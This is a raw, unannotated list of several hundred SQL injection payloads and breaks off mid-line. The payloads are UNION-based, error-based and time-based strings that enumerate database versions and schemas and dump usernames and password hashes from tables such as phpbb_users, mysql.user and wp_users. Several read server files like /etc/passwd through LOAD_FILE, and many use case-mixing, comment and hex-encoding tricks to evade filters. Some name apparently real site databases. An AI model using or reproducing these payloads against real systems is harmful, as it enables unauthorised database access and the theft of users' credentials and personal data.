union select 1,2,3,version(),5,6,7,8,9 -- -247 UnIoN SeLecT 1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 /* -247 union select 1,concat_ws(0x3a,username,user_password),3,4,5,6,7,8,9 from artbaze_specialradio_ru.phpbb_users limit 1,1-- -2482 union select 1,2,3,4,concat_ws(0x3A3a,version(),user(),database()),6,7,8,9,10,11/* -2486 union select 1,version(),3-- 2489999 union select null,null,password,nome,null,data,null from utenti where Admin=true 2489 and substring(version(),1,1)=5# 248 and 1=@@version -- -248 union select 1,2,concat(database(),0x3a,user(),0x3a,version()),4,5,6/* -248 union select 1,2,group_concat(login,char(58),passw),4 from admins -248 union select 1,version(),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,34/* 248' UNION SELECT concat_ws(0x3a,user(),database(),version()) -- -2492 union select 1,2,3,4,5,6,7,8,9,10,11,12,version(),14,15,16,17,18 -- 2493 union select 1,2,3,4,5,group_concat(table_name),7,8,9,10,11,12,13 from information_schema.tables group by table_schema /* -24940 union select 1,2,3,4,pass,6,7,8,9 from admin-- -24946 union select 1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,0,1,2,3,4,5,16 -- -2494 union select 1,VERSION(),3,4,5,6,7,8,9,10,11,12,13/* -24969 union select 1,2,3,concat_ws(0x2F,user_id,user_name,user_password),version(),6,7,8 from video_users/* 249729999 UNION SELECT 1,2,3,4,5,concat_ws(0x3a,version(),user())/* -249802 union select 1,2,3,4,5,concat(user(),0x3a,database(),0x3a,version())/* -249 union select 1,2,3,4,5,6,7,@@version -- -249 union select 1,2,concat_ws(0x3a,AdminName,AdminEmail,AdminID,Username,Password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 FROM mlm_administrator LIMIT 0,1-- 24 and 1=0 union select 1,2,3,4,group_concat(table_name),6,7,8,9,10 from information_schema.tables where table_schema=database() -- 24 and (select 1 from (select count(0),concat((select concat(id,0x3a,username,0x3a,password,0x3a,email) from admin_users limit 0,1),floor(rand(0)*2)) from information_schema.tables group by 2)a)-- 24' or 1 group by concat(user(),version(),database(),floor(rand(0)*2))having min(0) or 1-- -24 union select 0,1,2,3,4,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/* -24/**/UNION/**/SELECT/**/0,1,concat_ws(0x0b,table_name,column_name),3,4,5,6,7,8,9 FROM INFORMATION_SCHEMA.COLUMNS-- -24 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 -- -24 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,concat_ws(0x3a3a,mail,password,surname),21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 from privatearea_user -- -24 union select 1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,version(),user(),database()),14,15,16,17 -24 union select 1,2,3,4,5,6,7,8,name,10,11,12,13,14,15,16,17,18,19,20 from ramzesexpo/* -24 union select 1,2,3,4,5,6,7,concat_ws(char(58,58),user(),version(),database()),9,10,11,12,13/* -24 union select 1,2,3,4,5,6,concat(email,0x3a,name,0x3a,password),8,9,10,11,12,13,14,15,16,17 from user/* -24 union select 1,2,3,4,5,6,concat(uname,0x3a,upass),8 from admin/* -24 union select 1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15-- -24 union select 1,2,3,4,concat_ws(0x2F,id,login,password),6,version(),8,9,10 from dtool_users/* 24 union select 1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10 limit 1,1 -24 union select 1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6-- -24 union select 1,2,3,concat_ws(0x3a,user(),@@version_compile_os,version()),5,6,7,8,910,11,12,13,14,15,16,17,18-- -24 unIOn sELeCT 1,2,3,concat_ws(0x3a,version(),database(),user()),5-- -24 union select 1,2,3,concat_ws(0x3a,version(),database(),useR()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- -24 UNION SELECT 1,2,3,group_concat(0x3a,username,password) from admin_panel-- -24 UNION SELECT 1,2,3,LOAD_FILE(0x2F6574632F706173737764),5,6,7,8/* -24 union select 1,2,concat(version(),0x3a,database(),0x3a,user()),4,5,6,7,8,9-- 24 union select 1,2,concat_ws(0x3a3a,UserLogin,UserPassword),4,5,6,7,8,9,10 from user -- -24' union select 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,0 -- 24 UNION SELECT 1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10/* -24 union select 1,2,group_concat(ID,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47 from useraccounts -24 union select 1,2,table_name from information_schema.tables-- -24' union select 1,2,user,password,5,6,7,8,9,10,11,12 from mysql.user/* -24 union select 1,2,user,password from mysql.user/* -24' union select 1,2,user(),version(),5,6,7-- -24 union select 1,concat(email,0x3a,password),3,4,5,6,7,8,9,10 from members/* -24 union select 1,concat(user,0x3a,pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from users-- 24' union select 1,concat(version(),0x3a,database(),0x3a,user()),3,4,5,6 limit 1,1/* -24 union select 1,concat_ws(0x3a,database(),version(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32-- -24' union select 1,concat_ws(0x3a,login,password),3,4,5,6 from xcart_customers limit 1,1-- -24 union select 1,concat_ws(0x3a,user(),version(),database(),table_schema,table_name,column_name),3,4,5,6 from information_schema.columns where table_schema=database()-- -24 union select 1,concat_ws(0x3a,version(),user()),3,4-- -24 union select 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54 24 union select 1,concat_ws(char(32,45,32),version(),user(),database()),3-- -24 union select 1,group_concat(password,0x3a,sh),3,4,5,6,7,8 from fk_admin-- -24 union select 1,version(),3,4,5,6,7,8,9,10-- -24 UNION SELECT concat(version(),0x3a,user(),0x3a,database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/* -24 union select concat_ws(0x3a,nickname,password) from usuarios -- -24' union select concat_ws(0x3a,user(),version(),database()),2,3,4,5/* -24 union select concat_ws(char(58),username,password) from admin -24 union select table_name,2 from information_schema.tables-- -24 union select version() from users/* 250311 and 1=0 -25094 union select 1,2,passwd,4,5,6,7,8,9,10 from users/* -2510 union select 1,2,concat(username,char(58),password),4 from users 2511 and ascii(substring(user(),1,1))=0x72 2511 and (version() like 0x3325) 2511 union select concat(0x3a,version(),0x3a,user(),0x3a,database(),0x3a)-- -2511 union select table_name from sys.all_tables-- 2512 union select 1,2,concat(version(),0x3a,database(),0x3a,user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 -2517 union select 1,2,3,concat_ws(char(58),id,password),5,6,7,8,9 from users/* -251 and 1=2 union select 1,2,3,4,5,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 -- -251 union select 1,2,3,4,5,6,concat_ws(0x3a,id,nickname,md5id,password,email),8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 from shiznit_users where nickname='Bob'/* 251 union select 1,2,3,4,5,user(),7-- -251 union select 1,2,3,password,username,6,7,8,9 from users -251 union select 1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12-- -251 union select unhex(hex(group_concat(user,0x3a,password))),2,3,4,5,6,7,8,9 from mysql.user/* -2522 union select 1,2,3,4,concat_ws(char(58),version(),database(),user()),6,7,8,9,10,11,12,13,14,15 -- 2525 union select 1,concat_ws(0x3a,user(),database(),version()),3,4-- -2526 union select 1,2,3,4,password,6 from mysql.user/* 2529 union select 1,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),0,0,0 from mos_users/* 252 and 1=2 union select concat_ws(0x3a, table_name, table_schema,column_name),2,3 from information_schema.columns where table_name=CHAR(97,99,99,111,117,110,116)/* -252 UNION SELECT 1,2,AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x3a,Version(),Database(),User()),0x71),0x71),4,5,6,7,8,9,10,11,12,13,14 -252 union select 1,2,version(),database(),user(),6,7,8,9,10,11,12/* -252 union select 1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),group_concat(0x0b,table_name),4,5,6,7,8,9,10,11,12,13,14,15,16 from information_schema.tables-- -252 union select 1,unhex(hex(user())),3,4,5,6,7,8,9,10,11,12,13/* 252 union select concat_ws(0x3a,database(),user(),version()) 252 union select concat_ws(0x3a,login,pass) from mp_xteam.users -2532 UNION SELECT 1,2,aes_decrypt(aes_encrypt(concat(user(),0x3a,version(),0x3a,database()),1),1),4,5,6,7,8,9,10,11,12,13,14,15,16/* 2535 and 1=0 UNION SELECT 1,2,version(),4,5,6,7 -- 253 and substring(@@version,1,1)=4===>false -253 union select 1,2,3,4,5,unhex(hex(table_name)),7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0 from information_schema.tables-- -253 union select 1,2,3,concat(0x2a,user(),0x2a,database(),0x2a,version()) -253 union select 1,concat_ws(char(58,58),user(),database(),version()),3,4,5,6,7/* -2540 union select 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96 from information_schema.tables limit 282,1000-- 254 OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID(concat_ws(0x3a,VERSION(),user(),database()),1,63), FLOOR(RAND(0)*2))) -254 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,concat_ws(char(58),user(),version(),database()),25/* -254 union select 1,2,3,4,5,6,7,8 from admin -- -254' union select 1,2,(selectunhex(hex(version()))),4,5,6,7,8-- -254' uNioN seLeCt 1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from information_schema.tables -- -254 union select 1,table_name,3,4,5,6,7,8,9,0,11,12,13,14,15,16 from information_schema.tables limit 17,1-- -254 UNION SELECT concat_ws(0x3a,version(),user(),database()),2,3,4,5,6,7,8-- 25509 and 1=0 union select 0,1,2,3,4,5,6,7,version(),9,10 -2550' union select 1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- -2555 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40/* 25560 union select 1,2,user(),4,5,6,7,8,9,10 from information_schema.tables -- -2557 union select 1,user(),3,4,5,6,7,8,9,10,version(),database(),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42/* 255 and 1=0 union select 1,2,id,4,password,6,7,8,9,10 from users -255 union select 1,2,3,4,5,6,group_concat(table_name),8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6 from information_schema.tables-- 255/*!union*/select 1,2,3,4,5,version(),7,8 -- -255 union select 1,2,3,concat(0x3a,version(),0x3a,user()),5-- -2561 union select 1,2,3,4,5,concat_ws(0x3a,database(),version(),user()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31-- -25632 UNION SELECT 1,2,3,concat_ws(0x3a,user(),version(),database()),5,6# 256 AND 1@i order by table_name LIMIT 1))),@o),6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3-- -25 union select 1,2,3,4,concat(version(),0x3a3a,user(),0x3a3a,database()),6,7,8,9/* -25 union select 1,2,3,4,concat_ws(version(),0x3a,user(),0x3a,database()),6,7-- -25 union select 1,2,3,column_name,5,6 from information_schema.columns where table_name='account'-- -25 union select 1,2,3,concat(login,0x3a,password),5,6,7,8,9,0 from aadm_users-- 25 union select 1,2,3,concat(name_users,char(58),password_users,char(58),email_users,char(58),tel_users),0x68612d68613b29,6,7,8,9,10,11,12,13,14 from users/* -25 union select 1,2,3,concat_ws(0x3a3a,Code,T_Code,Login,Passwd,FIO,www,EMail),5,6 frOm ls_dw_Users -- -25 union select 1,2,3,concat_ws(char(58),gmlevel,username,char(58),id,char(58),sha_pass_hash,char(58),sessionkey,char(58),v,char(58),s,char(58),email,char(58),joindate,char(58),last_ip,char(58),failed_logins,char(58),locked,char(58),last_login,char(58),online,char(58),tbc,char(58),mutetime,char(58), locale,char(58)),5,6 from account-- -25/**//*!union*//**//*!select*/1,2,3,user(),5,6,7,8,9-- -25 union select 1,2,3,@@version_compile_os-- -25 union select 1,2,binary(user()),4,5,6,7,8-- -25 union select 1,2,cast(concat_ws(0x3a,user(),version(),database()) as binary),4,5,6,7,8 from users-- -25 union select 1,2,concat(user(),0x3a,0x3a,version(),0x3a,0x3a,database()),4,5,6,7,8,9,10,11,12,13,14,15/* -25 UNION SELECT 1,2,concat(user(),0x3a,database(),0x3a,version()),4,5,6,7/* -25 union select 1,2,concat(version(),0x3a,database(),0x3a,user()),4,5-- 25 union select 1,2,concat(version(),0x3a,database(),0x3a,user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 limit 1,1/* -25 union select 1,2,concat_ws(0x3A3a,version(),database())/* -25' union select 1,2,concat_ws(0x3a,ID,user_name,user_pass),4 from accounts -- -25 union select 1,2,concat_ws(0x3a,user(),version(),database,@@version_compile_os),4,5,6-- -25 union select 1,2,concat_ws(0x3a,version(),database(),useR()),4,5,6,7,8 25 union select 1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17-- -25 union select 1,2,convert(concat(user,0x3a,password,0x3a,host),binary),4,5,6,7,8,9,0,1,2 from mysql.user limit 2,1/* -25 union select 1,2,database(),user(),version()/* -25 union select 1,2,group_concat(table_name),4,5,6,7,8,9,10 from information_schema.tables -- -25 union select 1,2,unhex(hex(concat_ws(0x3a,admin_login,admin_passwd))),4,5,6,7,8,9,10,11 from administrators/* -25 union select 1,2,unhex(hex(version())),4,5,6,7,8,9,10,11,12,13/* -25 union select 1,2,version(),4,5,6,7,8-- 25 union select 1,concat(0x2a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14 -25 union select 1,concat(username,0x2a,pass),3,4,5,6,7,8,9 from admins -25 union select 1,concat(version(),0x3a,database(),0x3a,user()),3,4,5,6,7,8,9,10,11,12,13/* -25 union select 1,concat_ws(0x203a20,user(),version(),database()) from news/* -25 union select 1,concat_ws(0x3a,login,pwd),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 from auth-- -25 union select 1,concat_ws(0x3a,table_schema,table_name),3,4 from information_schema.tables limit 351,1-- 25 union select 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8 -25' union select 1,database(),3 /* 2-5 UNION SELECT 1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16 from information_schema.columns where table_name=0x6573636f727473 -- -25 UNION SELECT 1,load_file('/etc/httpd/conf/httpd.conf')-- -25 union select 1,now(),3,4,5,concat_ws(0x0b,database(),user(),version(),@@version_compile_os),7,8,9,group_concat(0x0b,table_name),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from information_schema.tables-- -25 union select 1,option_name,option_value from wordpress.wp_options/* -25 union select 1,version(),3,4,5,6,7,8,9,0,1,2,3,4,5,6 -25 union select concat(version(),char(58),user()),2,3,4/* -25 union select concat_ws(0x3a,admin_user,admin_pass) from admin -25 union select concat_ws(0x3a,version(),user(),database()),2,3,4,5,6,7,8,9,10-- -25 union select concat_ws(user(),version(),database(),@@version_compile_os) -25 union select group_concat(table_name) from information_schema.tables -- -2604 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat_ws(0x3a3a,id,username,password),22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52 from admin limit 6,1 -- -2605 UnIon selECt 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47-- 26063 union select 1,2,3,4,5,6,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),database(),user()),0x71),0x71)/* 26063 UNION SELECT CONCAT_WS(0x3a,user,password),2,3,4,5,6,7 from mysql.user/* 2606 union select 1,2,user(),4,5,6,7,8,9,10,11,version(),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34/* 260 and 1=0 UNION SELECT 1,2,3,4,5,group_concat(table_name SEPARATOR 0x3A),7,8,9,10 FROM information_schema.tables WHERE table_schema=0x7761746368796F315F67616D6563686E -260 union select 1,2,3,4,5,6,concat(password,0x20,userid),8 from users-- 2613 union select 1,2,version(),4,5,6,7,8,9,10,11,12-- 261 and 1=0 UNION SELECT 1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16 -- -261 union select 1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x2a,database(),version(),user(),@@version_compile_os),14,15,16,17,18,19,20,21,22,23,24,25,26 -261' union select 1,2,3,4,cast(version() as char),6,7,8,9 -- -261 union select 1,2,3,4,version(),6,user(),8,9,10,11,12 -- -2621 union select 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- -262 union select 1,2,3,4,5,6,group_concat(username,char(58),password),8,9,10,11,12,13,14 from adminc0sp -- 262 union select 1,2,unhex(hex(concat(version(),0x3a,database(),0x3a,user()))),4,5,6,7,8/* -2633 union select convert(user using latin1),2,password,4,5,6,7,8,9,10,11,12 from mysql.user/* -2636 union select 1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a3a,email,login,pass,viewed),12,13,14 from artist limit 2,1 -- -263 union select 1,2,3,concat(name,':',password,':',email),5,6 from forum_user/* 2646' OR 1=(select top 1 cast(IdUtente as nvarchar) ':' cast(EMail as nvarchar) ':' cast(Password as nvarchar) ':' cast(Stato as nvarchar) ':' cast(Nome as nvarchar) ':' cast(Cognome as nvarchar) ':' cast(RagioneSociale as nvarchar) ':' cast(Indirizzo as nvarchar) ':' cast(Citta as nvarchar) ':' cast(Cap as nvarchar) ':' cast(Provincia as nvarchar) ':' cast(Telefono1 as nvarchar) ':' cast(Telefono2 as nvarchar) ':' cast(Telefono3 as nvarchar) from Utenti where IdUtente=1)-- -264 union select 1,2,3,4,5,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),7-- -264 union select 1,2,pw,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,0x697427732061646d696e,24,25,26,27,user,29,30 from users/* -264 union select 1,2,user(),version(),5,6,7,8,9,10,11/* -264 union select 1,version(),3,4,5,6,7,user(),9,10,11,12,13,14,15,16/* -2650 union all select 1,aes_decrypt(aes_encrypt(concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),0x71),0x71)-- 26544 group by 19-- 26570 union select 1,2,concat(username,char(58),user_password),4,5,6 from phpbb_users limit 1,1/* -265 UNION SELECT 1,usuario,3,pass,5,6,7,8,9 FROM usuarios limit 0,100/* -2666 union select 1,concat(0x3a,pass,login),3,4,5 from mts_admins-- -26678' union select 1,GROUP_CONCAT(concat_ws(0x3a,table_schema,TABLE_NAME) SEPARATOR 0x3C62723E),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.columns where column_name like 0x257061737325 or column_name like 0x25702577256425-- -266 union select 1,2,3,unhex(hex(concat_ws(0x3a,version(),database(),user(),@@version_compile_os))),5,6,7,8 -266 union select 1,concat(name,0x3a,password),3,4,5,6,7,8,9,10 from users order by 10,1/* 266 union select version(),user(),3,4,5,6,7,8,9,10,database(),12,13 limit 1,1/* 267393;select null,null from information_schema.tables; 267393 union select version(),null -2679 union select concat_ws(0x0b,version(),user(),database(),@@version_compile_os),group_concat(0x0b,name,0x3a3a,password,0x3a3a,email),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1 from members-- 267 and 1=0 union select 1,2,concat_ws(0x3a,user,name),4,5 from sexmoves limit 3,1-- -267 union select 1,2,3,4,5,concat_ws(0x3a3a,version(),database(),user()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- -267 union select concat(version(),char(58,58),database(),char(58,58),user()),2/* -268520741 union select concat(table_schema,0x3a,table_name,0x3a,column_name),null from information_schema.columns where table_schema like 0x6C3225/* -26853 union select concat_ws(0x3a,user,password,host,file_priv),concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,load_file('/etc/passwd'),9,10,11,12 from mysql.user-- 268760980341 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat_ws(0x3a,version(),user(),database())-- 268 and 1=0 UnIon selECt 1,2,3,4,5,6,group_concat(table_name),8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.tables where table_schema=0x7373616e67796f6e5f6d61696e -- -268 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,1,2,3,1,4,5,7,6,1,1,1,1/* 268 UNION SELECT 1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),user(),database()),10/* -2691 union select 1,password,3,4 from users/* -2692 union select version(),2,user(),4,database(),6/* 2694 and 1=0 union select 1,2,3,4,concat_ws(char(32,58,32),user(),version(),database(),@@version_compile_os),6,7,8,9,10,11,12,13,14,15 269 AND 1=254,1,0,benchmark(2999999,md5(now())) -27612 union select 1,2,3,4,5,6,concat(convert(database() using cp1251),convert(char(59) using cp1251),convert(user() using cp1251),convert(char(59) using cp1251),convert(version() using cp1251))/* 27612 union select 1 limit 1,1-- 27612 union select aes_decrypt(aes_encrypt(load_file(0x2F6574632F706173737764),0x71),0x71) limit 1,1-- 276276' UNION SELECT 1,2,3,4,5,6,7,concat_ws(0x3a,user_login,user_pass),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 FROM wp_rasmusondbs.wp_users/* 276276' UNION SELECT 1,2,3,4,5,6,7,concat_ws(0x3a,version(),user(),database()),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/* -2768 union select 1,2,concat(user,0x3a,pass) from admin/* -276 union select 1,2,table_name,4,5,table_schema,7 from information_schema.tables limit 17,1-- 276 UNION/**/SELECT/**/1,CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),3,4,5,6,7,8,9,10,11/**/LIMIT/**/1,1-- -27770 union select 1,VERSION(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/* 277987987668768768 union select 1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- 277' and 0 union select 1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13-- 277 UNION SELECT 1,2,3,4,concat_ws(0x3,password),6,7,8,9,10,11 from grandliteadmin limit 1,1-- 277 union select group_concat(table_name),2,3,4 from information_schema.tables -- -27855 uNIon sELEct 1,2,concat_ws(0x3a3a,username,password),4,5,6,7,8,9 from users limit 5,1 -- -2789 union select 1,2,3,4,5,6,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),8,9-- 278 and 1=0 union select 1,2,3,4,concat(user,char(58),password),6,7,8,9,10,11,12,13,14,15,16,17,18 from mysql.user-- -278 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,name,19,20,21,22,23,24,25,26 from user -- -278 union select 1,2,concat_ws(0x2F,user(),version(),database()),4,5/* 2798792698 union select 1,2,3,4,5,6,7,concat_ws(0x3a,version(),user(),database()),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- 27987986650 union select 1,2,concat_ws(0x3a,version(),user(),database())-- 2798798698768 union select 1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,version(),user(),database())-- 27-999.9 union select 1,2,3,4,5,6,7,8,9,concat_ws(user(),version(),database()),11-- -279 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5 -- -279 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- 27 and 1=0 union select 1,concat_ws(0x3a,id,login,pwd),3,4,5 from users limit 0,1-- 27 and 1=0 union Select 1,version(),3,4,5-- 27' and 1=0 UnIon selECt 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 -- 27 and 1=0 union select UNHEX(HEX(CONCAT_WS(0x3a,database(),version(),user()) )) 27 and 1=cast((SELECT version()||chr( 58)||current_user||chr(58)||current_database()) as int)-- 27 AND ASCII(SUBSTRING((select y=1..3()),1,1))>x/* 27 or 1=(select db_name())-- 27' or 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES) -- 27' union select 1,2/* -27 union select 1,2222,3,4,concat_ws(0x3a,table_schema,table_name,column_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,233333,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,5333,54,55,56 from information_schema.columns/* -27 union select 1,2,3,4,0x3C4D4152515545453E73716C2D696E6A20FDF2EE20EAF3EBFC3C2F4D4152515545453E,6,7,8,9,10/* -27 union select 1,2,3,4,5,6,7,8,9,0,group_concat(table_name),2,3,4,5,6,7,8,9,0,1,2,3,4,5 from information_schmea.tables-- 27 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- 27 union select 1,2,3,4,5,6,7,8,9,10,11,12,13 from msysaccessobjects -27 union select 1,2,3,4,5,6,7,8,9,10,11,version(),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102/* -27 /*!UnIoN*/SeLeCT 1,2,3,4,5,6,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),8,9,10,11,12,13,14,15,16,17,18,19-- -27 union select 1,2,3,4,5,concat_ws(0x3a,user_id,name,pass),7,8,9 from adbm_user-- -27 union select 1,2,3,4,5,concat_ws(0x3a,user(),version(),database()),7,8/* -27 union select 1,2,3,4,5,concat_ws(0x40,user(),database(),version(),@@version_compile_os),7-- 27 union select 1,2,3,4,concat_ws(0x3a3a3a,name,password,email),6 from users limit 0,1 -- -27 union select 1,2,3,4,concat_ws(0x3a,version(),database(),user())/* 27 union select 1,2,3,4 from msysaccessobjects -27 union select 1,2,3,concat_ws(0x3a,user(),version(),database()) -27 UNION SELECT 1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8-- -27 UNION SELECT 1,2,3,concat_ws(version(),user(),database()),5,6,7-- -27 union select 1,2,3,concat_ws(version(),user(),database()),5,6,7,8-- -27 union select 1,2,3,database(),5,6,7,user(),9,10,11-- -27 union select 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15-- -27 union select 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/* -27 union select 1,2,AES_DECRYPT(AES_ENCRYPT(email,0x71),0x71),4,5,6,7,8,9,10 from members/* -27 union select 1,2,concat(@i:=0x00,@o:=0x0d0a,benchmark(25,@o:=CONCAT(@o,0x0d0a,(SELECT concat(table_schema,0x2E,@i:=table_name) from information_schema.tables WHERE table_name>@i order by table_name LIMIT 1))),@o),4,5,6,7,8,9 -- -27 union select 1,2,concat(user(),0x3a,version()),4,5,6,7,8,9/* 27 union select 1,2,concat_ws(0x3a,version(),database(),user()) ,4,5,6,7,8,9-- 27 union select 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 limit 1,1/* -27 union select 1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.columns where table_name=char(97,100,100,114,101,115,115) -- -27 ' union select 